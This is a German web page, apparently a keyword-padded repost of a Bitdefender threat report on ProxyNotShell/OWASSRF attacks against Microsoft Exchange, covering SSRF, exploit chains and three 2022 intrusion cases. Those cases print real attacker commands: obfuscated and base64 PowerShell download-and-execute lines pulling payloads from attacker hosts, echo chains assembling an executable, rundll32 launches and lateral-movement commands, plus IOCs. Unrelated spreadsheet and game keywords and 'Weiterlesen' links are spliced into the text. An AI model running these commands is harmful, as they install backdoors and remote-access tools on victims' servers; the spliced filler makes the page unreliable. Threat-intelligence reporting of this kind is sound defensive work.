Antivirensoftware Test 2022: Effektiver Schutz vor Exchange-Angriffen

Grundlegende Implementierung eines Proxy-Service-Endpunkts, der eine Anfrage an den Backend-Dienst weiterleitet

In der digitalen Welt von 2022 sind Cyberbedrohungen allgegenwärtig und entwickeln sich ständig weiter. Für Unternehmen ist der Schutz ihrer IT-Infrastruktur essenziell, und ein umfassender Antivirensoftware Test 2022 muss daher weit über die Erkennung einfacher Malware hinausgehen. Er muss die Fähigkeit einer Sicherheitslösung bewerten, selbst gegen hochkomplexe Angriffe standzuhalten, die Schwachstellen in kritischen Systemen wie Microsoft Exchange ausnutzen. Ende November 2022 stellten Experten von Bitdefender Labs eine deutliche Zunahme solcher Attacken fest, die auf On-Premises Microsoft Exchange-Bereitstellungen abzielten, indem sie ProxyNotShell/OWASSRF-Exploit-Ketten nutzten. Diese Angriffe verdeutlichen, dass traditionelle Antivirenprodukte allein oft nicht ausreichen, um vor den raffinierten Taktiken heutiger Cyberkrimineller zu schützen. Server-Side Request Forgery (SSRF)-Angriffe auf Microsoft Exchange-Server gehören zu den am häufigsten genutzten Schwachstellen. Die hier präsentierten Erkenntnisse und Fallstudien bieten tiefe Einblicke in die Bedrohungslandschaft des Jahres 2022 und zeigen, welche Aspekte bei der Bewertung moderner Schutzlösungen entscheidend sind.

Die Bedrohungslandschaft 2022: Warum herkömmlicher Schutz nicht mehr ausreicht

Die Service-orientierte Architektur (SOA) hat sich über lange Zeit bewährt. Sie ist ein Software-Designansatz, der ein System als Sammlung von Diensten organisiert, die über klar definierte Schnittstellen miteinander kommunizieren. Die Hauptidee hinter SOA ist, die unabhängige Entwicklung und Wartung verschiedener Softwarekomponenten zu ermöglichen und diese in unterschiedlichen Kombinationen zur Erstellung neuer Systeme zu komponieren und wiederzuverwenden.

Ein Hauptvorteil von SOA ist die größere Flexibilität und Skalierbarkeit durch das Aufheben von Anwendungsgrenzen. Dieses Konzept führte jedoch auch zu neuen Sicherheitsherausforderungen, da Sicherheitsmodelle nicht länger fest in Anwendungen kodiert sind. Ein gängiger Ansatz ist es, nur wenige gehärtete Service-Endpunkte offenzulegen, die als Proxy für die anderen Dienste fungieren. Der Begriff „Endpunkt“ bezieht sich hier nicht auf einen physischen Endpunkt (wie Desktop oder Laptop), sondern auf einen netzwerkadressierbaren Endpunkt eines Dienstes, typischerweise eine URL, über die mit einer Dienstkomponente interagiert werden kann.

Grundlegende Implementierung eines Proxy-Service-Endpunkts, der eine Anfrage an den Backend-Dienst weiterleitetGrundlegende Implementierung eines Proxy-Service-Endpunkts, der eine Anfrage an den Backend-Dienst weiterleitet

Abb. 1 – Grundlegende Implementierung eines Proxy-Service-Endpunkts

Microsoft Exchange ist ein Beispiel für eine Anwendung, die Proxy-Dienste nutzt, um das sensible Backend vom unvertrauenswürdigen öffentlichen Netzwerk abzuschirmen. Über die Jahre entwickelte sich die Microsoft Exchange-Philosophie zu einem Prinzip der Co-Location – alle Exchange-Server (außer Edge-Transport-Server) sind Multi-Rollen-Server und verlassen sich auf die Trennung von Rollen. Die Client Access Services (CAS) bilden eine Schicht, die für die Annahme aller Arten von Client-Verbindungen (Frontend) und deren Weiterleitung an Backend-Dienste zuständig ist.

Abb. 2 – Hochrangiger Überblick über die Microsoft Exchange-Architektur

Da CAS- und Backend-Dienste auf demselben Exchange-Mailbox-Server gehostet werden, müssen Sicherheitskontrollen vorhanden sein. Backend-Dienste akzeptieren nur Anfragen mit einem gültigen Kerberos-Token von CAS. Selbst wenn eine direkte Verbindung zu ihnen hergestellt werden könnte, würden sie alle Verbindungen ablehnen, die nicht von einem der CAS-Dienste stammen. Hier zeigt sich, wie wichtig eine genaue Überprüfung ist, die in jedem guten antivirensoftware test 2022 beleuchtet werden sollte, um solche komplexen Interaktionen abzusichern.

Server-Side Request Forgery (SSRF) – Eine unterschätzte Gefahr

Wie bei vielen anderen “Secure by Design”-Architekturen wurden schnell neue Angriffstechniken entdeckt, um diese scheinbar sicheren Systeme anzugreifen. Server-Side Request Forgery (SSRF) ist eine Art von Angriff, die es einem Angreifer ermöglicht, eine manipulierte Anfrage von einem anfälligen Server im Namen des anfälligen Servers an einen anderen Server zu senden. Dies kann dem Angreifer den Zugriff auf Ressourcen oder Informationen ermöglichen, die ihm sonst nicht direkt zugänglich wären, und auch Aktionen im Namen des anfälligen Servers durchführen lassen.

Zum Beispiel könnte ein Angreifer, wenn eine Webanwendung anfällig für SSRF ist, eine Anfrage vom anfälligen Server an eine lokale Netzwerkressource senden, die normalerweise für den Angreifer nicht zugänglich ist, wie etwa eine Datenbank. Alternativ könnte der Angreifer eine Anfrage an einen externen Server, beispielsweise einen Cloud-Dienst, senden, um Aktionen im Namen des anfälligen Servers durchzuführen. Um einen SSRF-Angriff erfolgreich auszuführen, muss der Angreifer in der Lage sein, eine Anfrage vom anfälligen Server zu senden, und auch den Inhalt der Anfrage so manipulieren können, dass er die gewünschten Ressourcen zugreifen oder die gewünschten Aktionen ausführen kann.

Weiterlesen >>  Inkscape: Ihr leistungsstarkes Grafikprogramm kostenlos

Abb. 4 – Ein Beispiel für einen SSRF-Angriff, der einen Proxy-Service-Endpunkt ins Visier nimmt

Exchange Proxy-Angriffe: Evolution und Techniken (2021-2022)

Die meisten Schwachstellen, die von Sicherheitsforschern entdeckt werden, basieren auf fehlerhaften Implementierungen – zum Beispiel Speicherfehler oder Code-Injektionen. Es ist eher selten, Schwachstellen in der High-Level-Architektur zu finden. Architektur-Schwachstellen sind in Produktionssystemen schwer zu beheben, insbesondere bei weit verbreiteter Software, bei der Abwärtskompatibilität ein wichtiges Merkmal ist – wie bei Microsoft Exchange-Servern.

Anfang 2021 beschlossen die Sicherheitsforscher Orange Tsai und das DEVCORE Research Team, die CAS-Implementierung genauer unter die Lupe zu nehmen. Überraschenderweise entdeckten sie nicht nur mehrere kritische Schwachstellen, sondern identifizierten CAS auch als eine neue Angriffsfläche, die auf allen Microsoft Exchange-Servern seit Exchange 2013 vorhanden ist. Die CAS-Implementierung auf On-Premises Microsoft Exchange-Servern ist anfällig für SSRF-Angriffe. Und diese erste Entdeckung war nur die Spitze des Eisbergs.

Abb. 5 – Microsoft Exchange CAS ist anfällig für SSRF-Angriffe

SSRF-Angriffe sind typischerweise auf die Verletzung der Verfügbarkeit oder Vertraulichkeit beschränkt – zum Beispiel Denial of Service oder die Offenlegung sensibler Daten. Werden sie jedoch mit anderen Schwachstellen kombiniert, können sie Exploit-Ketten bilden, die zu Remote Code Execution (RCE) führen. Moderne Antivirensoftware Test 2022 Prüfungen müssen daher die Erkennung und Abwehr solcher Ketten umfassen.

Betrachten wir eine dieser Exploit-Ketten genauer, um besser zu verstehen, wie Exploits zusammenarbeiten. Wir verwenden ProxyShell als Beispiel, mit seiner Kombination aus drei verschiedenen Exploits. Der erste Exploit ist der bekannte SSRF-Angriff, der SYSTEM-Zugriff auf die Backend-Dienste gewährt. Da SYSTEM keine Mailboxen daran angehängt hat, nutzt der Bedrohungsakteur einen (De-)Eskalations-Exploit, um seinen/ihren Zugriff auf ein Domänenkonto “herunterzustufen”. Als Nächstes speichert der Bedrohungsakteur den Code der Web-Shell als E-Mail in der Mailbox-Datenbank. Mithilfe von PowerShell Remoting wird diese E-Mail dann mithilfe des New-MailBoxExportRequest-Cmdlets als .pst-Datei exportiert, jedoch mit der Erweiterung .aspx (die anfällige Version von Exchange validiert die Dateierweiterung nicht). Da die permutative Kodierung, die das PST-Dateiformat verwendet, gut dokumentiert ist, wird der verschlüsselte Web-Shell-Code in einem Format gespeichert, das während des Exportvorgangs automatisch entschlüsselt wird (clever!). Wenn man solche komplexen Mechanismen versteht, kann man auch besser einschätzen, welche Funktionen zum Beispiel bei einem excel windows server wichtig sind, um die Sicherheit zu gewährleisten.

Abb. 6 – ProxyShell Exploit-Kette

Microsoft Exchange ist aus verschiedenen Gründen ein ideales Ziel für diese Exploit-Ketten:

  • Es gibt ein komplexes Netzwerk von Frontend- und Backend-Diensten mit Legacy-Code zur Gewährleistung der Abwärtskompatibilität (viele-zu-viele-Beziehungen).
  • Backend-Dienste vertrauen den Anfragen von der Frontend-CAS-Schicht – im Falle eines SSRF-Angriffs wird ein gültiges Kerberos-Token von CAS generiert.
  • Mehrere Backend-Dienste, die als Exchange Server selbst laufen (SYSTEM-Konto).
  • Remote PowerShell (RPS) enthält Hunderte von PowerShell-Cmdlets.

In relativ kurzer Zeit wurden mehrere Kombinationen von Schwachstellen entdeckt:

  • ProxyLogon – Die ursprüngliche Exploit-Kette war eine Kombination aus CVE-2021-26855 und CVE-2021-27065. Das Ergebnis war eine RCE-Kette, die keine Authentifizierung erforderte.
  • ProxyShell – Die zweite Exploit-Kette war eine Kombination aus CVE-2021-34473, CVE-2021-34523 und CVE-2021-31207. Das Ergebnis war eine RCE-Kette, die keine Authentifizierung erforderte.
  • ProxyNotShell – Diese Exploit-Kette war eine Kombination aus CVE-2022-41080 und CVE-2022-41082. Während diese RCE-Kette eine Authentifizierung erfordert, können beliebige gültige Anmeldeinformationen zur Eskalation des Zugriffs verwendet werden.
  • OWASSRF – Zuerst von Crowdstrike gemeldet, verwendet diese Exploit-Kette dieselbe Kombination von Schwachstellen wie ProxyNotShell. Der Unterschied besteht darin, dass anstelle des Autodiscover-Dienstendpunkts der OWA-Dienstendpunkt vom CAS-Frontend verwendet wird. Durch das Ändern des vom SSRF-Angriff anvisierten Dienstendpunkts können Bedrohungsakteure die von Microsoft bereitgestellten Minderungshinweise umgehen.
Weiterlesen >>  Die besten kostenlosen DVD-Player 2025 für Windows 10/11: Ihr Leitfaden zum reibungslosen Abspielerlebnis

Diese Liste der Exploit-Ketten ist keineswegs erschöpfend – es gibt weitere Ketten, die Autodiscover- und OWA-Dienste ausnutzen. Es überrascht nicht, dass diese Exchange-Schwachstellen sowohl in den “2021 Top Routinely Exploited Vulnerabilities” als auch in den “Top CVEs Actively Exploited by People’s Republic of China State-Sponsored Cyber Actors” (ab Oktober 2022) aufgeführt sind. Ein gründlicher Antivirensoftware Test 2022 muss daher auch die Abwehr solcher fortgeschrittenen, sich schnell entwickelnden Bedrohungen berücksichtigen.

Praxisfälle 2022: So sah die Bedrohung aus

In diesem Abschnitt werfen wir einen Blick auf einige reale Angriffe, die unsere Experten in den Bitdefender Labs entdeckt haben. Ende November 2022 stellten wir eine verstärkte Nutzung von ProxyNotShell/OWASSRF zur Ausführung bösartiger Befehle fest. Die Angriffsziele befanden sich hauptsächlich in den Vereinigten Staaten, aber auch Unternehmen aus Polen, Österreich, Kuwait und der Türkei waren betroffen. Die Branchen dieser Opfer waren Immobilien, Anwaltskanzleien, Fertigung, Beratung, Großhandel, Kunst & Unterhaltung, aber wie erwartet waren die meisten dieser Angriffe opportunistisch und nicht gezielt.

Fall 1 – Remote-Administrationstools

Im ersten Fall nutzten Bedrohungsakteure die ProxyNotShell-Exploit-Kette und versuchten, zwei verschiedene Remote-Access-Tools zu deployen. Das erste Tool war Meterpreter – eine Metasploit-Angriffsnutzlast, die eine interaktive Shell bereitstellt und mithilfe von In-Memory-DLL-Injektion eingesetzt wird –, das zweite war ConnectWise Control (ehemals ScreenConnect). Die Bedeutung einer robusten Verteidigung gegen solche Einschleusungsversuche ist ein Kernelement für jeden excel formel mwst berechnen oder anderen geschäftskritischen Prozess, der auf sicheren Systemen ausgeführt werden muss.

Beispiele für Befehlszeilen, die während dieses Angriffs erkannt (und blockiert) wurden:

Befehle
msiexec /q /i c:\windows\temp\c.msi powershell -nop -c $ds = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('https://autodiscover.hofd***[.]org/owa/auth/Current/themes/resources/6.css', 'c:\windows\temp\c.msi')
rundll32 c:\windows\temp\l.ttf,guewik powershell -nop -c $ds = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('https://mail.fcp***[.]us/owa/auth/Current/themes/resources/ls.css', 'c:\windows\temp\l.ttf')
msiexec /q /i c:\windows\temp\nn.msi powershell -nop -c Invoke-Expression (New-Object Net.WebClient).DownloadFile.Invoke('https://mail.fcp***[.]us/owa/auth/Current/themes/resources/a.css', 'c:\windows\temp\nn.msi')
msiexec /q /i c:\windows\temp\ss.msi powershell -nop -c $ds = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('https://autodiscover.livi***.org/owa/auth/Current/themes/resources/ss.css', 'c:\windows\temp\ss.msi')
powershell.exe -e cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAHAAIAAtAGMAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAuAEkAbgB2AG8AawBlACgAJwBoAHQAdABwAHMAOgAvAC8AYQB1AHQAbwBkAGkAcwBjAG8AdgBlAHIALgBoAG8A<redacted>AC8AbwB3AGEALwBhAHUAdABoAC8AQwB1AHIAcgBlAG4AdAAvAHQAaABlAG0AZQBzAC8AcgBlAHMAbwB1AHIAYwBlAHMALwA2AC4AYwBzAHMAJwAsACAAJwBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcAGMALgBtAHMAaQAnACkACgA=
Powershell.exe -e bQBzAGkAZQB4AGUAYwAgAC8AcQAgAC8AaQAgAGMAOgBcAHcAaQBuAGQAbwB3AHMAXAB0AGUAbQBwAFwAYwAuAG0AcwBpAAoA
powershell.exe -e dwBoAG8AYQBtAGkACgA=

Die Angriffe wurden von den IP-Adressen 64.190.113[.]48 und 162.243.150[.]6 gestartet. Alle Staging-Server, von denen die Nutzlast heruntergeladen wurde, waren zuvor kompromittierte Microsoft Exchange-Server, höchstwahrscheinlich mit derselben Methode kompromittiert.

URLMD5 des heruntergeladenen InhaltsHinweise
https://autodiscover.hofd***.org/owa/auth/Current/themes/resources/mb.cssd375f2fab8e85975cc19a60a6aebca94Downloader für Meterpreter mit C&C 162.243.150[.]6
https://autodiscover.hofd***.org/owa/auth/Current/themes/resources/6.css43250dd7f3a01c689131849c39f36482ConnectWise Control mit Relayserver 66.42.116[.]130:443
https://mail.fcp***[.]us/owa/auth/Current/themes/resources/ls.cssd765cf358376604b90eba4f5dccb4ceaDownloader für Meterpreter mit C&C 64.190.113[.]48
https://mail.fcp***[.]us/owa/auth/Current/themes/resources/a.css5d08e4593bc214dc4c86064fb8a1c776ConnectWise Control mit Relayserver 91.206.178[.]76:443
https://mail.fcp***[.]us/owa/auth/Current/themes/resources/b.css80ce2d5f2689a7c5ccf13843c962c6f1ConnectWise Control mit Relayserver 155.138.240[.]251:443
https://mail.st*********.org/owa/auth/Current/themes/resources/6.css43250dd7f3a01c689131849c39f36482ConnectWise Control mit Relayserver 66.42.116[.]130:443
https://autodiscover.livi***.org/owa/auth/Current/themes/resources/ss.cssa60f1c6e19d09661ca61502603ada352ConnectWise Control mit Relayserver 45.77.91[.]209:443
https://mail.o***.ca/owa/auth/Current/themes/resources/4.cssdaf0b4b216ef9e046af3c863eea559a7ConnectWise Control mit Relayserver 45.77.146[.]144:443
https://mail.o***.ca/owa/auth/Current/themes/resources/mc.css8de8561f2440281155bbfe20666643faConnectWise Control mit Relayserver 149.28.249[.]156:443

Alle URLs und Befehlszeilen wurden blockiert, und wir können nur vermuten, dass die Bereitstellung von Ransomware das wahrscheinlichste Ziel für die Bedrohungsakteure war.

Fall 2 – Initial Access Broker

Im zweiten Fall versuchten Bedrohungsakteure, mittels Web-Shells Persistenz auf dem kompromittierten System zu installieren. Eine Web-Shell ist ein bösartiges Programm (oder Skript), das auf einen Webserver hochgeladen wird, um unbefugten Zugriff auf den Server zu erlangen. Sobald die Web-Shell eingesetzt ist, ermöglicht sie einem Angreifer die Ausführung beliebiger Befehle oder Skripte und die Durchführung einer Vielzahl von Aktionen, wie das Hochladen zusätzlicher Malware, das Stehlen sensibler Daten oder das Starten von Angriffen auf andere Systeme.

Web-Shells werden häufig von Initial Access Brokern (IAB) verwendet. Ein Initial Access Broker ist eine Art Cyberkrimineller, der sich darauf spezialisiert hat, den initialen Zugriff auf das Netzwerk einer Zielorganisation zu erlangen. Sobald der initiale Zugriff erlangt wurde, kann der Access Broker den Zugriff auf das kompromittierte Netzwerk an andere kriminelle Gruppen verkaufen oder vermieten.

Weiterlesen >>  Rechnungsprogramm kostenlos Vollversion: Dein ultimativer Leitfaden zu den besten Tools

Schwachstellen wie Exchange-Proxy-Exploit-Ketten sind eine Goldgrube für Access Broker, da sie oft opportunistische Angriffe anstelle von gezielten bevorzugen. Mit dem Aufkommen von Ransomware-as-a-Service-Gruppen können Initial Access Broker eine stetige Versorgung mit potenziellen Ransomware-Zielen für Ransomware-Affiliates bereitstellen. Ein seriöser Antivirensoftware Test 2022 muss auch die Erkennung und Abwehr solcher IAB-Taktiken berücksichtigen.

Bei diesem Angriff werden mehrere Echo-Befehle miteinander verkettet, um eine ausführbare Base64-Datei auf einer Festplatte zu generieren. Dies zeigt, wie Angreifer kreative Wege finden, um Schutzmechanismen zu umgehen, ähnlich wie man mit excel cube funktionen komplexe Datenstrukturen manipulieren kann, wenn die zugrunde liegende Sicherheit unzureichend ist.

Befehle
cmd.exe /c echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAA...AIPCQIsIUWig0EAAUv/W5UUM>>&%TEMP%\\sMIod.b64
cmd.exe /c echo cwgj6CEtUgChGNBAAOKA8IsNENBAADtSfiuLVQyLDcjA...YGgslQAAUVDo14kAABhQaK+H>>&%TEMP%\\sMIod.b64
cmd.exe /c echo MACF1otNvItVuB9F3FGLTdhSi5V8//8fUIuFeIX//1GL...AACLkzQ9AJwr94uDVAgAIRvC>>&%TEMP%\\sMIod.b64
cmd.exe /c echo O7d/CnzBO89qBDPJXcCJThiJRhz/zEhOAAAqgyQISwA+...9nU0hf8udXIbtwAAQlOJdfzo>>&%TEMP%\\sMIod.b64
cmd.exe /c echo 7BUAAIt1CDP/hX7zAnVhixZqAWpragAGzfdMAAA9dhEj...UegZeQAAUP8VkMBqAF3CWJ07>>&%TEMP%\\sMIod.b64
cmd.exe /c echo kL+QMJCQkJCQkJCQkP0q7ItFEFaLdaNXNKgI3UgZi1AQ...lF7/dYPEwV3DkJCQkJCQkJCQ>>&%TEMP%\\sMIod.b64
cmd.exe /c echo kJCkkJDbVYvsg+xcK0UIU59XdSBXi30YPGNBHItNHI1F...AIPEkIXAddmLRZC7BAAUAFOD>>&%TEMP%\\sMIod.b64
cmd.exe /c echo wAhogDCtAFD/dgTBJO6DxAyFwHUOi00qJAbTAABmx0EM...PlKJRfzJiPjonfP//0J7SAEA>>&%TEMP%\\sMIod.b64
cmd.exe /c echo JFPozQMPADPJiUUIO8F0FYtDWFDo7/P/p4tFCJNcCovl...TIzNDU2Nzg5AAAAAAAAAAAA>>&%TEMP%\\sMIod.b64
cmd.exe /c echo AAAAAgAAAgAAAAAAAAAAAAAAAAAAAAAAAAEBAgEDAwMD...dGhhbiB0d2ljZSB0aGUgc3Rh>>&%TEMP%\\sMIod.b64
cmd.exe /c echo bmRhcmQKICAgICAgIGRldmlhdGlvbiBhcGFydC4gVGhl...aWxlICAgICAgRmlsZSBjb250>>&%TEMP%\\sMIod.b64
cmd.exe /c echo YWluaW5nIGRhdGEgdG8gUFVULiBSZW1lbWJlciBhbHNv...AAAAAAAAAAAAAAAAAAAAAAAA>>&%TEMP%\\sMIod.b64
cmd.exe /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAA>>&%TEMP%\\sMIod.b64
cmd.exe /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...ZWxlYXNlXGFiLnBkYgA=>>&%TEMP%\\sMIod.b64

Die Echo-Kette wird auch verwendet, um eine VBScript-Datei am Speicherort %TEMP%qawWu.vbs zu generieren. Nach Ausführung dieser VBScript-Datei liest sie den Inhalt der Base64-Datei sMIod.b64, dekodiert ihren Inhalt und speichert ihn an einem neuen Speicherort %TEMP%ujjQl.exe. Nach dieser Operation wird die ausführbare Datei gestartet und beide Dateien sMIod.b64 und qawWu.vbs werden gelöscht.

Nachdem ujjQl.exe ausgeführt wurde, lädt diese bösartige ausführbare Datei eine weitere ausführbare Datei von http://mail.p***a.com/owa/auth/data.zip (MD5 ad362104eea7afcd727b77e89a4a5e2e) herunter. Als Ergebnis dieser Operation werden zwei .aspx-Dateien (Web-Shells) an folgenden Speicherorten erstellt:

  • %ExchangeInstallPath%FrontEndHttpProxyecpauthLogout.aspx (MD5 ad086021b7ee50ff5b9acec4d79736be)
  • %SystemDrive%inetpubwwwrootaspnet_clientsystem_web\iisstart.aspx (MD5 607a6987395f02086e0e355c9ba4d76e)

Fall 3 – Cuba Ransomware

In diesem Fall nutzten Bedrohungsakteure die ProxyNotShell-Exploit-Kette, um PowerShell-Befehle auszuführen. Zunächst versuchten sie, die komar<xx>.dll</xx> herunterzuladen, die wir als Bughatch-Downloader identifizierten. Bughatch ist dafür bekannt, bei Cuba-Ransomware-Operationen eingesetzt zu werden, aber unsere Attribution basiert hauptsächlich auf vielen bekannten IOCs und wiederverwendeter Infrastruktur. Nachdem die Download-Befehle blockiert wurden, fuhren sie mit der unbeaufsichtigten (stillen) Installation des GoToAssist-Tools fort. GoToAssist ist eine legitime Remote-Support-Software von LogMeIn Inc.

Ausgeführte Befehle
c:\windows\system32\inetsrv\w3wp.exe -ap "MSExchangePowerShellAppPool" -v "v4.0" -c <redacted>
powershell.exe (New-Object Net.WebClient).DownloadFile('https://lostbussiness[.]com:443/ga.exe', 'C:programdataga.exe')
C:programdataga.exe
powershell.exe (New-Object Net.WebClient).DownloadFile('https://devoterfo[.]com:443/komar66.dll', 'C:programdatakomar66.dll')
rundll32.exe c:programdatakomar66.dll,?Show@CConfigDlg@@QEAAXXZ
powershell.exe (New-Object Net.WebClient).DownloadFile('https://devoterfo[.]com:443/komar64.dll', 'C:windowstempkomar64.dll')
RunDll32 C:windowstempkomar64.dll,ConvertPng
powershell.exe (New-Object Net.WebClient).DownloadFile('https://devoterfo[.]com:443/ga.exe', 'C:programdataga.exe')
C:programdataga.exe
C:Program Files (x86)GoToAssist Remote Support Unattended1847923225473922339GoToAssistUnattended.exe
powershell.exe (New-Object Net.WebClient).DownloadFile('https://devoterfo[.]com:443/addp.dll', 'C:programdataaddp.dll')
RunDll32 C:programdataaddp.dll,Start

Der nächste Schritt war die laterale Bewegung mittels GoToAssist. Diese Art der Netzwerkdurchdringung ist ein Alarmsignal, das ein guter schiffe versenken excel anleitung nicht lösen würde, aber eine fortschrittliche Antivirensoftware erkennen und unterbinden sollte.

Befehle
cmd.exe /C nltest /dclist:
net group "Domain Admins" /domain
ping
ping <dc2>
cmd.exe /C copy 23-145s.bat \<machine1>C$windowstemp</machine1>
cmd.exe /C copy 23-145s.dll \<machine1>C$windowstemp</machine1>
cmd.exe /C copy kk.dll \<machine1>C$windowstemp</machine1>
cmd.exe /C copy komar65.dll \<machine2>C$windowstemp</machine2>
cmd.exe /C copy kk65.bat \<machine2>C$windowstemp</machine2>
cmd.exe /C copy rdp.bat \<machine3>C$windowstemp</machine3>

Um den Zugriff aufrechtzuerhalten, erstellten die Bedrohungsakteure auch Benutzerkonten mit lokalen Administratorrechten. Sie versuchten, verschiedene Tools herunterzuladen, wobei einige Dateien über PowerShell und andere Dateien von den bereitgestellten Tools heruntergeladen wurden. Die Analyse der heruntergeladenen Tools:

URLMD5 der heruntergeladenen BinärdateiDetails
https://devoterfo[.]com:443/komar66.dll53c2f5ebde7c5417b2b4081070643da1Lädt einen Shellcode von http://38.135.122[.]130/Agent64.bin herunter und führt ihn aus; interessanterweise gelingt der Download nur, wenn der User-Agent auf einen dieser beiden Werte eingestellt ist – „Mozilla/4.0“ und „Mozilla/5.0“; der 4.0 User-Agent wird vom Downloader verwendet und der 5.0 vom finalen Backdoor während des Update-Vorgangs;
https://devoterfo[.]com:443/komar65.dll2c0584f95b33a77e20060cc569a5279aVerhält sich wie komar66.dll
https://devoterfo[.]com:443/komar64.dll617180092c3935de27dfff0090e5de70Verhält sich wie komar66.dll
https://devoterfo[.]com:443/addp.dll43bc56681d4149001119ea87021ea52aErstellt den Benutzer SqlDbAdmin und fügt ihn den lokalen Gruppen Administratoren und Remote Desktop Users hinzu
https://devoterfo[.]com:443/cps.exe5d700d932297094dda08a7398640cd24